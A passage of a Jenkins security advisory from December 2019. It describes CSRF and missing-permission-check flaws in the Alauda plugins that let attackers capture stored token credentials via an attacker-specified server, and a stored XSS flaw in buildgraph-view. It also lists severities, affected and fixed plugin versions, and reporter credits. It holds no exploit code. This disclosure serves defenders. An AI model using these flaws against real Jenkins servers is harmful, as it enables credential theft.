Alauda DevOps Pipeline Plugin 2.3.2 and earlier does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to Kubernetes-related paths on an attacker-specified web server using attacker-specified credentials IDs obtained through another method, capturing token credentials managed by Alauda DevOps Pipeline Plugin.

Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability in Alauda Kubernetes Suport Plugin**

**SECURITY-1602 / CVE-2019-16575 (CSRF), CVE-2019-16576 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: alauda-kubernetes-support**  
**Description:**

Alauda Kubernetes Suport Plugin 2.3.0 and earlier does not require POST requests on a connection test method, resulting in a CSRF vulnerability. This allows attackers to have Jenkins connect to Kubernetes-related paths on an attacker-specified web server using attacker-specified credentials IDs obtained through another method, capturing 'Secret Text' credentials stored in Jenkins.

Additionally, if no credentials ID is specified, the connection uses the default Kubernetes token from /var/run/secrets/kubernetes.io/serviceaccount/token.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-1371: Medium
*   SECURITY-1521: Low
*   SECURITY-1527: Medium
*   SECURITY-1580: Medium
*   SECURITY-1581: Medium
*   SECURITY-1591: Medium
*   SECURITY-1592: Medium
*   SECURITY-1593: Medium
*   SECURITY-1597: Low
*   SECURITY-1598: Medium
*   SECURITY-1600: Medium
*   SECURITY-1602: Medium
*   SECURITY-1603: Medium
*   SECURITY-1604: Medium
*   SECURITY-1605 (1): High
*   SECURITY-1605 (2): Medium
*   SECURITY-1636: Medium
*   SECURITY-1651: Medium
*   SECURITY-1681: High

**Affected Versions**

*   **Alauda DevOps Pipeline Plugin** up to and including 2.3.2
*   **Alauda Kubernetes Suport Plugin** up to and including 2.3.0
*   **Build Failure Analyzer Plugin** up to and including 1.24.1
*   **buildgraph-view Plugin** up to and including 1.8
*   **Gerrit Trigger Plugin** up to and including 2.30.1
*   **Mantis Plugin** up to and including 0.26
*   **Maven Release Plug-in Plugin** up to and including 0.16.1
*   **Mission Control Plugin** up to and including 0.9.16
*   **Pipeline Aggregator View Plugin** up to and including 1.8
*   **RapidDeploy Plugin** up to and including 4.1
*   **Redgate SQL Change Automation Plugin** up to and including 2.0.3
*   **Rundeck Plugin** up to and including 3.6.5
*   **SCTMExecutor Plugin** up to and including 2.2
*   **Spira Importer Plugin** up to and including 3.2.3
*   **Team Concert Plugin** up to and including 1.3.0
*   **WebSphere Deployer Plugin** up to and including 1.6.1
*   **Weibo Plugin** up to and including 1.0.1

**Fix**

*   **Build Failure Analyzer Plugin** should be updated to version 1.24.2
*   **Gerrit Trigger Plugin** should be updated to version 2.30.2
*   **Maven Release Plug-in Plugin** should be updated to version 0.16.2
*   **Pipeline Aggregator View Plugin** should be updated to version 1.9
*   **Redgate SQL Change Automation Plugin** should be updated to version 2.0.4
*   **Rundeck Plugin** should be updated to version 3.6.6
*   **Spira Importer Plugin** should be updated to version 3.2.4

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Alauda DevOps Pipeline Plugin
*   Alauda Kubernetes Suport Plugin
*   buildgraph-view Plugin
*   Mantis Plugin
*   Mission Control Plugin
*   RapidDeploy Plugin
*   SCTMExecutor Plugin
*   Team Concert Plugin
*   WebSphere Deployer Plugin
*   Weibo Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Alex Earl (@alexcearl), Marvell Semiconductor, Inc.** for SECURITY-1527
*   **Cheng Gao, Alibaba Cloud Intelligence Security Team, https://www.aliyun.com/** for SECURITY-1681
*   **Daniel Beck, CloudBees, Inc.** for SECURITY-1371, SECURITY-1580, SECURITY-1581, SECURITY-1651
*   **James Holderness, IB Boost** for SECURITY-1521
*   **Viktor Gazdag NCC Group** for SECURITY-1591, SECURITY-1592, SECURITY-1593, SECURITY-1597, SECURITY-1598, SECURITY-1600, SECURITY-1602, SECURITY-1603, SECURITY-1604, SECURITY-1605 (1), SECURITY-1605 (2)
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1636

CVE-2019-16563: Jenkins Security Advisory 2019-12-17

Jenkins buildgraph-view Plugin 1.8 and earlier does not escape the description of builds shown in its view, resulting in a stored XSS vulnerability exploitable by users able to change build descriptions.

Tag

#csrf